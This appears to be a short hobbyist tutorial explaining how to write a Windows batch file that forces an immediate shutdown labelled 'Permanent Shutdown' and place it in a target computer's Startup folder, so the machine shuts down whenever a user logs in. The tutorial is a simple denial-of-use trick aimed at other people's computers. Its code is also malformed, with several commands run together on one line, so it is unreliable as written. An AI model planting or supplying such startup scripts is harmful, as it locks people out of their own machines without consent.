Shut Down Pc When Someone Logs In
by Nikz in Circuits > Computers
606 Views, 6 Favorites, 0 Comments
Shut Down Pc When Someone Logs In
HOW TO AUTOMATICALLY SHUT DOWN A PC AS A USER LOGS IN
copy the follwing code and paste it in a note pad
@echo off
cd / shutdown -s -t 00 -c "Permanent Shutdown" exit
Save
after pasting the codes in note pad save it with a name of your desire or u can use my same name
save it with .bat extension and choose files type as all files
once you are done,the computer u want to shut down as a user logs in
go to start up folder and place this batch file in that folder so next tine as a user logs in this batch file will automatically execute